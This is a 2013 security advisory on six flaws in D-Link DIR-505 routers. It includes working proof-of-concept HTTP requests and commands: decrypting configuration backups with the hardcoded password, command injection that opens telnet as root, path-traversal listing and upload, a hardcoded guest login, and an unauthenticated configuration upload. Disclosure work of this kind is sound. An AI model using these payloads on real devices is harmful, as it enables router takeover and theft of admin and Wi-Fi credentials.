Multiple vulnerabilities on D-Link Dir-505 devices
==================================================

[ADVISORY INFORMATION]
Title:		Multiple vulnerabilities on D-Link Dir-505 devices
Discovery date: 05/04/2013
Release date: 	09/09/2013
Credits: 	Alessandro Di Pinto (alessandro.dipinto () artificialstudios org)
Twitter: 	@adipinto

[AFFECTED PRODUCTS]
This security vulnerability affects the following products and firmware
versions:

* D-Link DIR-505, firmware version <= 1.06

Other products and firmware versions could also be vulnerable, but they were
not checked.

[VULNERABILITY DETAILS]

1) Weak configuration file encryption
The file provided to the end-user in order to make a backup copy of the device
configuration, is encrypted with a hardcoded password. The device firmware
creates the configuration file in three specific steps, as shown below:
   - Collect the configuration data to backup
   - Encrypt entries with the hardcoded password "sw5-superman"
   - Create the file header through the tool "imghdr"

The file header has the fixed-size of 84 byte. An attacker ables to get an
encrypted configuration file could decrypt its contents with the following
command:

   sh# dd if=config-file of=config-file-no-header bs=84 skip=1
   sh# ccrypt -d -K sw5-superman config-file-no-header

Decrypted file contains sensitive information that an attacker could use
in order to compromise the target device (e.g., admin password and WPA
passphrase).

Furthermore, an attacker can craft a own configuration file, encrypt it with
the hardcoded password, append at the beginning of file a valid header and
finally upload the new configuration to the target device without
authentication, exploiting the "Authentication bypass" issue described inside
this advisory.


2) Command Injection
An authenticated attacker can exploit the "Ping Test" feature exposed inside
the page "/System_Check.htm", in order to execute arbitrary commands inside the
device, with root privileges. More precisely, the "ip_addr" parameter is not
sanitized properly, thus it is possible to leverage traditional command
injection techniques. This security issue is exploitable only after a
successful authentication.

Proof-of-Concept used to open telnet on vulnerable devices:

"""
POST /my_cgi.cgi HTTP/1.1
Host: [IP]
Cookie: uid=[VALID-COOKIE-HERE]
Content-Length: 55

request=ping_test&ip_addr=127.0.0.1; /usr/sbin/telnetd;
"""

3) Path traversal (directory listing)
The web-gui exposed through the port 8181/TCP is used to explore the contents
of the USB drive, connected at the device. Normally the end-user is allowed to
list only the files inside the own USB drive but, due to insufficient security
checks, an attacker is ables to list the contents of every file system
directories. Only authenticated users can exploit this issue.

Proof-of-Concept used to list the device's /etc/ directory:

http://192.168.0.1:8181/dws/api/ListFile?id=admin&tok=
	&volid=1&path=usb_dev/usb_A1/../../../../etc


4) Path traversal (file upload)
The web-gui exposed through the port 8181/TCP allows authorized users (e.g.,
admin user) to upload files inside the USB drive connected at the device. The
upload feature is present at the following link:

http://[IP]:8181/folder_view.htm

The upload operation is performed through a POST request to the resource
"/dws/api/UploadFile" using a "multipart/form-data" content-type. Several
parameters are passed but the "path" parameter can be abused in order to modify
the destination directory of the uploaded file. This issue allows an
authenticated user to upload an arbitrary file inside the target device.

Proof-of-Concept used to upload a simple text file inside the /tmp/ directory:

"""
POST /dws/api/UploadFile?0.35494315220771677 HTTP/1.1
Host: [IP]:8181
Cookie: uid=[VALID-COOKIE-HERE]
Content-Type: multipart/form-data;
	      boundary=---------------------------736034324104825609817274318
Content-Length: 1179

-----------------------------736034324104825609817274318
Content-Disposition: form-data; name="id"

admin
-----------------------------736034324104825609817274318
Content-Disposition: form-data; name="tok"

-----------------------------736034324104825609817274318
Content-Disposition: form-data; name="volid"

1
-----------------------------736034324104825609817274318
Content-Disposition: form-data; name="path"

usb_dev/usb_A1/../../../../../../../../../tmp/
-----------------------------736034324104825609817274318
Content-Disposition: form-data; name="filename"

exploit.txt
-----------------------------736034324104825609817274318
Content-Disposition: form-data; name="upload_file"; filename="test.txt"
Content-Type: text/plain

malicious text
-----------------------------736034324104825609817274318--
"""


5) Privilege escalation (hardcoded credential)
The upload feature, described in the issue 4 titled "Path traversal (upload
file)", is theoretically designed to be used only by authorized users (selected
through the web-gui). The device has the following hardcoded user which cannot
be deleted using the web-gui:

username: guest
password: guest

Using this credential, the end-user can access the web-gui (exposed on the port
8181/TCP) in read-only mode; the button used to upload files is disabled in
attempt to deny unauthorized operations. However due to a wrong session
handling, an attacker can bypass described limitation following below steps:
    - Login with the hardcoded user "guest" in order to get a valid cookie.
    - Using this cookie it is possible to make a direct upload request like the
      Proof-of-Concept described previously in the issue 4.

The purpose of this exploit is to perform an arbitrary file upload using an
hardcoded (read-only) user.


6) Authentication bypass
The "my_cgi.cgi" resource exposes several features accessible with no
authentication. In particular, every request that specifies the HTTP header
field "Content-type: multipart/form-data" is processed without perform any
authentication check. An *unauthenticated* attacker can exploit this issue in
order to upload a malicious configuration on the target device, overwriting the
original configurations (e.g., set a new admin password).

Proof-of-Concept used to upload a configuration file without perform the login:

"""
POST /my_cgi.cgi HTTP/1.1
Host: [IP]
Cookie: uid=[VALID-COOKIE-HERE]
Content-Type: multipart/form-data;
	      boundary=---------------------------4318828241986447042487864450
Content-Length: 382

-----------------------------4318828241986447042487864450
Content-Disposition: form-data; name="which_action"

load_conf
-----------------------------4318828241986447042487864450
Content-Disposition: form-data; name="file"; filename="attacker-config.bin"
Content-Type: text/plain

[MALICIOUS-CONFIGURATION-HERE]
-----------------------------4318828241986447042487864450--
"""

[REMEDIATION]
D-Link has released an updated firmware version (1.07) that addresses most of
the described issues. Firmware is already available on D-Link web site, at the
following URL:
ftp://ftp.dlink.com/Gateway/dir505/Firmware/dir505_fw_107.zip

[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.